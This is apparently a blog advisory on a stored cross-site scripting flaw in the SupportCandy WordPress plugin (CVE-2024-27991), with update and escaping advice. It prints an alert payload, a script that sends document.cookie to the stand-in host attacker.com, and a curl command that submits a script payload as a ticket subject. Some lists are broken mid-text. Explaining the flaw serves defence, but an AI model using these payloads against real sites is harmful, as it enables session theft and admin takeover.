In early 2024, security researchers uncovered a critical vulnerability in the popular WordPress support ticket plugin SupportCandy. The flaw—tracked as CVE-2024-27991—affects all versions up to 3.2.3 and lets attackers inject malicious scripts into your website, compromising security for both admins and users. In this post, we’ll explain how this “Stored Cross-site Scripting” (Stored XSS) vulnerability works, walk through a real-world exploit, and give clear guidance for users.
What Is CVE-2024-27991?
CVE-2024-27991 is an Improper Neutralization of Input vulnerability during web page generation (called "Cross-site Scripting" or XSS) in SupportCandy. When an attacker submits an input that’s not correctly sanitized or escaped, that code is saved (stored) in the database—so when staff or users view the malicious ticket or message, the code executes in their browser.
Affected:
Versions: All releases through 3.2.3 (as of March 2024)
References:
- NVD CVE-2024-27991
- WPScan Advisory
Deface your website
- Redirect visitors to phishing/malware pages
Install other backdoors or malware
If your site uses SupportCandy and you allow visitors or customers to create tickets, you’re at risk.
Vulnerable Input
SupportCandy allows users to submit new support tickets with a subject and message. These inputs are rendered in the backend and sometimes on front-end pages without proper escaping.
Suppose an attacker submits a new ticket with the following as the *Subject* or *Message*
<script>alert('XSS by attacker')</script>
The malicious <script> tag is saved into the database as the ticket message or subject.
- When a staff member views the ticket in the WordPress dashboard, the JavaScript runs in their browser.
- The attacker can do much more than just pop alerts – for instance, they can steal cookies with
<script>
fetch('https://attacker.com/steal?c='+document.cookie)
</script>
Example Code Snippet: Submit Malicious Ticket via HTTP Request
Here’s a simple example using curl to submit an XSS payload as a “ticket” (assuming public ticket submission is enabled):
curl -X POST \
-d "subject=<script>alert('XSS')</script>" \
-d "message=Exploit test" \
https://targetsite.com/support/ticket-submit/
*(Replace /support/ticket-submit/ with the real endpoint—this varies depending on SupportCandy settings)*
When staff view the new ticket, the alert pops up. In a real attack, a stealthier script could steal session data, act as the victim, or spread the exploit.
They open a new ticket submitted by attacker
3. Their browser silently runs the script – attacker gains admin access, plants more malware, or defaces the site.
If your site serves customers, the XSS could even be triggered on public ticket pages or email notifications if input is reflected there.
How To Fix (Mitigation)
- Update Immediately: SupportCandy developers released 3.2.4 and later with the issue patched. Update your plugin from the WordPress repository or your site’s dashboard.
- Sanitize Input: If you’re customizing SupportCandy, always use esc_html() or wp_kses_post() to output user data.
Conclusion
CVE-2024-27991 is a dangerous XSS bug in SupportCandy that puts your staff and users at risk. Anyone using SupportCandy up to v3.2.3 should update immediately to stay safe.
Check your sites, patch your plugins, and always be careful with user-generated content—especially when it goes into the WordPress backend!
*Stay secure—and spread the word to any other SupportCandy site owners you know.*
References:
- CVE-2024-27991 at NIST NVD
- Official SupportCandy Plugin Page
- OWASP XSS Explanation
*This guide is original and written exclusively for this post.*
Timeline
Published on: 04/11/2024 01:25:07 UTC
Last modified on: 06/26/2024 16:04:53 UTC